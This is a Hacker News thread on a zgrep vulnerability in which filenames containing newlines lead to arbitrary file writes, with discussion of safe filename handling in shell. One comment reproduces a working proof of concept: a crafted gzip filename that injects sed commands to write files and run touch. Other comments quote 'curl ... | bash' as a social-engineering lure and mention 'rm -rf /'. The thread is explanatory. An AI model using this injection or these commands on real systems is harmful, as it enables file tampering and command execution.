Arbitrary file write vulnerability in GNU gzip's zgrep utility (redhat.com)
152 points by perihelions on April 18, 2022 | hide | past | favorite | 77 comments



The commit fixing this bug is here: https://git.savannah.gnu.org/cgit/gzip.git/commit/?id=dc9740...

While grep is written in C, zgrep is written in POSIX sh, and the bug came from using sed to escape arguments: sed is a line-oriented utility, which makes it a poor fit for operating on newline-containing strings (i.e. Linux filenames).
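A minimal sketch of the hazard (not zgrep's actual code, just the general pattern): sed applies its script to each input line independently, so per-character escaping done with sed leaves an embedded newline itself untouched.

```shell
#!/bin/sh
# A filename with an embedded newline; the second "line" is attacker-chosen.
name='archive.gz
;injected'
# Line-oriented escaping: each line is escaped separately, but the
# newline between them survives unescaped.
escaped=$(printf '%s\n' "$name" | sed 's/[^A-Za-z0-9_]/\\&/g')
printf '%s\n' "$escaped"
```

Anything that later splices $escaped into a larger sed or shell script sees two lines where one name was intended, which is the general shape of the zgrep bug.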


The thought of writing anything in sh is horrifying to me.


Check out GNU pass

It's like all sh


I didn't know pass was "GNU". I also recall it being pretty well written.


Original author of password-store was Jason Donenfeld (of Wireguard fame), and it was indeed well-written.


Yes! Actually I remember now being surprised to find out Jason had written it. His git repository is full of neat and interesting projects.


Pass is a wrapper script around git and gpg. You can get the functionality of `pass` by running git and gpg commands directly.

Learning git itself is non-intuitive, but the gpg utilities take the learning curve to a whole other level. If you want to make simple use of the gpg utilities, you should plan on setting aside a few full days to learn how they work. Or just use pass, which additionally leverages git for password history.


bash, actually.


This reminds me that filenames can contain newlines.


They can contain any octet except ASCII NUL and /.

That said, pretty much every filesystem's on-disk format has an explicit length field for file names. So in theory, there's nothing stopping them from supporting completely binary filenames - it's the kernel's VFS layer that treats NUL and / as special.
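A quick throwaway-directory demonstration that the kernel happily accepts control characters (here a newline and a tab) in a name; only NUL and / are rejected. `ls -b` prints non-graphic characters as C-style escapes.

```shell
#!/bin/sh
dir=$(mktemp -d)
cd "$dir" || exit 1
# A name containing a newline and a tab -- perfectly legal to the kernel.
touch "weird
name	here"
ls -b    # shows the name with \n and \t escapes
cd / && rm -rf "$dir"
```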


D:


And nulls :)


How exactly can they contain nulls?

fopen() takes a null-terminated filename, so if there were a null byte in the middle it would just truncate the filename.
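In practice they can't: every layer from the shell to the syscall interface treats strings as NUL-terminated, so a NUL never survives long enough to reach a filename. A small sketch of the bash/dash behavior (POSIX technically leaves NUL bytes in command substitution output unspecified):

```shell
#!/bin/sh
# Command substitution drops the NUL, so the kernel never even sees it.
name=$(printf 'before\0after')
printf '%s\n' "$name"   # the NUL is silently removed: beforeafter
```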


That might be a corrupt filename, one that can be opened only by its inode in debugfs or similar.


No they can’t.


Well, this seems like the sort of error that we've all made when throwing together our own personal scripts, so I guess it is somewhat heartening that the serious Red Hat folks would make it too.


It always seemed very strange to me that there is no way to generate escaped representations in sh/bash, because you do need that from time to time.


There is printf %q, a bashism I think

Sample usage, to escape a variable called v:

  v="$(printf '%q' "$v")"
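For instance, a value containing a newline comes back in a form that is safe to re-eval (bash shown here, since %q is a bashism; coreutils' standalone printf also supports %q with slightly different output):

```shell
#!/bin/bash
v='two
lines'
escaped=$(printf '%q' "$v")
echo "$escaped"            # e.g. $'two\nlines' (ANSI-C quoting)
# Round trip: eval-ing the escaped form reproduces the original value.
eval "w=$escaped"
[ "$w" = "$v" ] && echo "round trip OK"
```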


This is called ANSI-C quoting [1], and I am surprised it is not more popular, because I think it strikes a good compromise between readability and power.

I used it myself when I wrote a script that generates a self-executing bash script to restore mtimes for directories [2].

[1]: https://www.gnu.org/software/bash/manual/bash.html#ANSI_002d...

[2]: https://github.com/unqueued/storetouch


Thanks!


This one's pretty cool, example below per gzip-1.12/tests/zgrep-abuse:

  timdoug@box:~/gzip$ ls
  timdoug@box:~/gzip$ touch z
  timdoug@box:~/gzip$ echo test | gzip > 'z|
  p
  1s|.*|chosen-content|
  1w hacked
  etouch .\x2fhacked2
  d
  #
  #'
  timdoug@box:~/gzip$ zgrep test z*
  ztest
  timdoug@box:~/gzip$ ls hack*
  hacked  hacked2
  timdoug@box:~/gzip$ cat hacked
  chosen-content
  timdoug@box:~/gzip$


Thanks for this! Simple enough to type out even.


My epiphany was using find | xargs and realizing I need -print0 for the former and -0 for the latter to handle special characters. Then I realized all my previous bash scripts were WRONG...


Zero-delimited versions of common bash tools/idioms:

  xargs -0

  find ... -print0

  sort -z

  while IFS= read -r -d '' var; do ...; done

  env -0

  printf -- '%s\0' *
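Putting a couple of those together: with a newline-containing name in play, the NUL-delimited pipeline counts files correctly while the naive line-based one miscounts. A small self-contained sketch:

```shell
#!/bin/sh
dir=$(mktemp -d)
touch "$dir/plain" "$dir/has
newline"
# Naive: the embedded newline makes two files look like three lines.
find "$dir" -type f | wc -l
# NUL-delimited: each name arrives at xargs as one intact argument.
find "$dir" -type f -print0 | xargs -0 sh -c 'echo "$#"' sh
rm -rf "$dir"
```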


Don't you mean ascii null, not zero?


Don't you mean NUL, not null?


Is there any real use case for having filenames with newlines? Every time I recall that we have to design programs around that, I wonder why it's possible in the first place.


The only invalid character in a path is \0 (which of course would terminate the string immediately), and a particular filename cannot contain /, or be "." or "..". Doesn't even have to be unicode. Literally any other bytes.


Linux even allows filenames with end-of-transmission characters in them, which is a choice I'd question long before I start questioning newlines!


EOT or ctrl-D only has significance when typed into a tty. Once it has turned into a character, it is as harmless as any other byte value; it doesn't end anything by itself.


Doesn't the article show that newline isn't harmless at all?

Of course EOT doesn't end anything by itself, nor does 0x0a end a line by itself -- all that happens through code that interprets those characters in a particular way, so talking about the "danger" of a character in absence of any code that operates on it is meaningless. In the presence of code, on the other hand, "harmless" in the extreme sense means "there exists no code that will act up when presented this character", which the article shows to be wrong.


I'm aware, but it nevertheless doesn't make any sense to have it in a file name.


I'm just saying that it makes exactly as much sense as ctrl-E or any other control char, it has no special status.


There are quite a few ASCII control characters [1] that could make more sense than EOT, e.g., \t, \n, \e, etc.

But yes, EOT is not the only nonsensical character that you could put in a file name, and I never claimed such.

[1] https://en.wikipedia.org/wiki/Control_character#In_ASCII


I think it is good that it is so flexible, because you never know what kind of data you may want represented on your filesystem. I would rather that there be as few restrictions as possible.

There are cases where you will encounter lots of nasty filenames, especially if you are handling user generated content, like scraping from YouTube or Instagram.


It makes things like UTF-8 and other newer encodings easier: everything already has to support that nearly anything can be in a filename.


It doesn't directly help UTF8, since all the bytes it uses for encoding non-ASCII have the high bit set.

It might directly help with UTF16, I'm not sure.

But the general idea of "block only a few specific characters (\0 and /) and allow all the rest" does help with UTF8. If the designers had said something like "only ASCII letters and numbers and dashes and underscores", that would block UTF8, and we might have ended up with something like URL hostnames, where you use punycode to encode non-ASCII into ASCII.


The point is that unix behaviour is to treat filenames as byte strings, so no particular encoding is mandated by the kernel or by most tools. That made the transition to utf-8 fairly painless.


So it's easier to write insecure software. Wrong priorities.


> easier to write insecure software.

Not filtering untrusted inputs, and not escaping or handling them correctly, is how you write insecure software. Guarantees about arbitrary input don't change that (unless they're very strict, in which case that's indirectly filtering inputs anyway).


Why does that make it easier to write insecure software? Which is easier: dealing with bytes, only 2 of which have special meanings (/ and \0), or dealing with a ton of different character classes, each of which you have to think about and code for? The second case happened with URLs, so there are all sorts of weird rules about where you can have a ? in this section but not that section, plus percent encoding and punycode and the like.


A very odd coincidence that just a few hours ago there was another story about a 0-day in another de/compressor: https://news.ycombinator.com/item?id=31070256


Rarely am I a commenter of so few words, but: here be dragons.


"This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names."

Perhaps I don't get this because I have used Windows most of my life (and DOS before that) but is it valid to have newline characters in a Unix/Linux filename?


Unix filesystems can typically have filenames containing any bytes except "\0" and "/".

I believe you can also have newline characters in NTFS, although Windows Explorer appears to prevent creating a file with them.


I have been using the filename "meeting-notes:10/1 \n Unix & Windows.txt" to test various apps. It tends to expose just how brittle modern computing still is.


I made a whole collection: https://github.com/benibela/nasty-files


"--no-preserve-root" made me laugh. For testing unescaped calls to rm?


It's a bypass of the mitigation for an old trick: back in the day, you could watch someone nuke themselves off of IRC by convincing them to type rm -rf /.


It is there to mess with people calling rm * / in the directory.

Good thing there is not really any reason to call rm like that.


Oh, does that actually work? The * expanding a filename into an argument? I guess it all just ends up in argv.
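It does: globbing happens before rm ever runs, so a file named `-rf` simply becomes an argv entry and gets parsed as options. A sketch (using `set --` to show the expansion rather than actually running rm on it):

```shell
#!/bin/sh
dir=$(mktemp -d)
cd "$dir" || exit 1
touch -- '-rf' 'innocent'
# The shell expands * before the command runs; '-rf' is now an argument
# indistinguishable from an option.
set -- *
printf 'arg: %s\n' "$@"
# Writing ./* instead guarantees no expansion starts with '-'.
printf 'safe arg: %s\n' ./*
cd / && rm -rf "$dir"
```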


Oh cool! I use nasty-files as a submodule with some of my tests. I can't believe how long I went without testing against the filename corner cases.

I've found so much software that doesn't properly handle nasty filenames; I think this should be tested for more often.


Lol that broke git for me


There are no rules about what can be in a filename, except that as a matter of practice they can't contain \0 or /, because the kernel interprets these as end-of-string and path-element separator, respectively.


For even more fun NTFS filenames can actually have newlines in them if you access them with \\?\.


Good to know. :)

Another "queer" naming issue in Windows (JFYI), backslash and ALT+0160:

https://msfn.org/board/topic/131103-win_nt~bt-can-be-omitted...


https://superuser.com/questions/129519/which-file-systems-su...

So yeah, it looks like Linux filesystems accept this, but a lot of utilities break.


This doesn't even seem like a legitimate security vulnerability at all, just a generic behavior bug. I'm guessing there are countless bugs like this in a common Linux userland.

I'd argue that the security vulnerability only exists in a program which passes untrusted user input to zgrep, which would be an obviously insecure thing to do.

Unless zgrep claims it's safe against untrusted user input? But that would be weird and surprising.


16 years ago, there was a bug reported to zgrep where files with 1 newline caused it to behave incorrectly. It was patched without a CVE: https://git.savannah.gnu.org/cgit/gzip.git/commit/zgrep.in?i...

This year, there was a bug reported to zgrep where files with 2 newlines caused it to behave incorrectly. It got a CVE and a front page hacker news post.

I give it very good odds this vulnerability has seen next to zero exploitation in the wild in either of the two cases above.


So we're 16 years out from the three-newline bug.



When is this actually exploitable? Are there any common programs or setups that result in zgrep getting called on attacker-provided filenames?


The exploit would have to be a bit contrived.

There aren't, to my knowledge, common programs or setups that would cause this to matter.

This would probably be used for social engineering at best, where the attacker convinces a victim: "hey, git clone my repo, and then run zgrep "bad string" * for some contrived reason".

Someone who's trying to assist someone else on Discord or wherever probably won't consider running zgrep in an attacker-controlled directory dangerous, so they might do it, whereas if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.


> while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.

You'd be surprised. I wrote a Postfix tutorial ages ago and left my real email address in the To: of an example test email. I subsequently got a lot of emails from root@s with the exact same title and body over the years. Too many people copy-paste anything labeled as instructions without a second thought.


The thing I don't get is the statement "Attack Vector: Network" in the advisory, as well as the statement that it allows a remote attacker to write files.

I don't understand the bar for being called a network attack vector. Surely there's more to this than asking the user to run shell commands, right?


It sounds like a web service that allowed a user to upload a file with an attacker-chosen filename, and then ran zgrep on it, would be vulnerable.

Perhaps that's why?


That's actually the suggested installation mechanism for a lot of software. The most recent I can think of were some AWS CLI tools, as delivered by AWS. Height of irresponsibility, imo.


Given infinite code, yes. I would imagine exploitability would be rare, but that it’s easier to fix the vulnerability and move on rather than care about whether or not things are affected.


Why does a search tool even need to open a writable file handle?


It's for searching inside of compressed files, and does this by decompressing to a temporary directory.


… that is also shocking… it wouldn't just stream the decompression, perhaps piping the decompressed stream into grep itself?


zgrep does stream directly from gzip into grep.

You can see that here: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

It's also mentioned in one of the few comments in zgrep: https://git.savannah.gnu.org/cgit/gzip.git/tree/zgrep.in?id=...

> we use stdin to pass the gzip output to grep

zgrep does create a temporary directory to store the grep search pattern, but only if the pattern is passed via `zgrep -f`, and only if the pattern passed in is not a regular file (i.e. `zgrep -f <(echo "foo") some_file.gz` would create a temporary file with the contents "foo", not with the contents of some_file.gz, and `zgrep -f pattern_file search_file.gz` would not create any temporary file)
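The streaming shape is easy to see in miniature (a simplified sketch, not zgrep's exact code): decompress to stdout and let grep read the pipe, so no decompressed copy ever touches disk.

```shell
#!/bin/sh
dir=$(mktemp -d)
printf 'a test line\nanother line\n' | gzip > "$dir/sample.gz"
# Decompression is streamed straight into grep via the pipe.
gzip -dc -- "$dir/sample.gz" | grep -- 'test'   # prints: a test line
rm -rf "$dir"
```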




I'm sure there are a lot of closed-source Linux utilities that will break in the same or worse manners. The problem will never be found there.

The issue with finding flaws in source code is that it takes a massive amount of logical thought about what inputs are possible. For example, a newline is valid in a Linux file name, but I've never legitimately used one, nor do I believe I've even seen one in the last 25 years of using Linux.


> For example, a newline is valid in a Linux file name, but I've never legitimately used one, nor do I believe I've even seen one in the last 25 years of using Linux.

Likewise. I wonder if SELinux or AppArmor or the like allows setting a policy for valid filenames to create. E.g. no newlines, only valid UTF-8, only printable characters.


I’d like to see a flag somewhere to enable this. Perhaps it is a filesystem flag, similar to case-sensitivity.


I've seen them (specifically, filenames generated from values in a "modern" configuration language, JSON or YAML, that mistakenly had newlines in them). Fortunately, most of the shell tools involved used -print0 and the related options anyway (because once you have humans involved, it's the easy way to handle ordinary spaces in names), and the things that did break were only "some low-value data processing got skipped" rather than anything harmful.



